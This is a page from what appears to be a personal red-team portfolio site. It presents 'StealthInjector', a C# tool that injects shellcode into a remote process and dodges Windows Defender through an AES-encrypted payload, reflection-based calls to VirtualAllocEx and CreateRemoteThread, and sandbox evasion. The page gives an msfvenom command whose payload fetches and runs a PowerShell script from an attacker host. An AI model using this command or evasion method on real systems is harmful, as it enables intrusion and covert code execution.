πŸ‰
Gurpreet06
  • πŸ‘€Introduction
    • ☠️About me
    • ☎️Contact
  • πŸ‘ΎOffsensive Security
    • ⛓️OSEP
    • πŸ‰OSCP
    • ♾️OSWP
  • πŸ—³οΈHack The Box
    • β›ˆοΈCPTS
  • 🐞Zero-Point Security
    • βš”οΈCRTO
    • ⛓️CRTL
  • πŸ§™β€β™€οΈAltered Security
    • πŸ•·οΈCRTP
    • ⛓️CRTE
  • πŸ”΄Extreme Red Team Laboratories
    • πŸ“¬Active Directory Chains - MailService
    • πŸ“¬Active Directory Chains - IFIXTCENTCEN
  • πŸ’§Sektor7
    • πŸ”Red Team Operator
  • πŸ“•eLearnSecurity
    • ⛓️eCPPTv2
    • πŸ““eJPT
  • 🧊Mikrotik
    • πŸ–₯️MTCNA
  • ☒️Antivirus Bypass
    • β›ˆοΈCrowdStrike Falcon
    • β›ˆοΈBit Defender Premium Antivirus
    • β›ˆοΈSophos Intercept X Antivirus
    • β›ˆοΈSophos Home Premium Antivirus
    • β›ˆοΈKaspersky Plus Protection
    • β›ˆοΈHarmony Checkpoint Security
    • β›ˆοΈWatchGuard Advanced EPDR
    • β›ˆοΈTrend Micro Maximum Security
    • β›ˆοΈESET Security Premium Antivirus
    • β›ˆοΈMalwarebytes Premium Antivirus
    • β›ˆοΈNorton 360
    • β›ˆοΈAVIRA Prime Antivirus
    • β›ˆοΈMcAfee Total Protection
    • β›ˆοΈQuick Heal Total Protection
  • πŸ‘¨β€πŸ’»PROJECTS
    • πŸ•΅οΈInfoSniper (Bypassing Antivirus)
    • 🦈PowerSSH
    • πŸ•΅οΈPyExec
    • β˜ƒοΈPyWMI
    • πŸ“­ShareHunter
    • πŸŒ†ShadowDesk
    • πŸ›‚C2Serv
    • ⛷️StealthInjector
    • πŸ¦‚StealthInvoke
    • πŸ—οΈAMSI Patcher (Bypassing Antivirus)
    • πŸ§–β€β™‚οΈRDP-Stealer
    • πŸ“ΈTakeScreenShot
    • πŸ”‘SharpKeyLogger
    • πŸ‘ΏHellCat (EDR-Escaper)
    • 🎫ETW Patcher (Bypassing Antivirus)
    • πŸ€–PRPT (Bypassing Antivirus)
    • 🌐What Internet Knows About You (OSINT)
    • πŸ”PowerShell SSL Reverse Shell
    • πŸ“ΆWiFi - Crack
    • ⚠️ICMP Data Exfiltration
Powered by GitBook
On this page
  • Features
  • How the script works:
  • Note:
  • POC
  1. PROJECTS

StealthInjector

Process injection and Dynamic Shellcode Execution

StealthInjector.exe is an application written in C#, capable of injecting shellcode into a remote process and bypassing Windows Defender by directly decrypting our payload in memory and dynamically invoking functions such as VirtualAllocEx and CreateRemoteThread using System.Reflection module and obscuring their use in the code to evade static analysis.

Features

  • Remote Interactive shell

  • Dynamically Invoke functions like VirtualAllocEx and CreateRemoteThread

  • Inject shellcode into remote process

  • Basic Sandbox Evasion

How the script works:

  1. Payload Generation: First, we generate a malicious payload using msfvenom. The command is as follows: 

msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp

  1. Payload Encryption: Next, we encrypt the generated payload using AES256 algorithm. This step is crucial, as it obfuscates the payload, making it more challenging for antivirus programs like Windows Defender to detect the malicious code.

  2. We apply the same encryption approach to the VirtualAllocEx and CreateRemoteThread function names to obscure their use in the code.

  3. Dynamic Invocation and Decryption: Finally, using the System.Reflection module, we dynamically invoke these functions. The encrypted payload is then decrypted directly in memory.

Note:

Advanced antivirus programs may have hooked functions like "VirtualAllocEx" and "CreateRemoteThread." To execute our malicious payload, we first need to unhook them and then load our payload into memory.

POC

PreviousC2ServNextStealthInvoke

Last updated 1 year ago

πŸ‘¨β€πŸ’»
⛷️
12MB
Process_Injection.mp4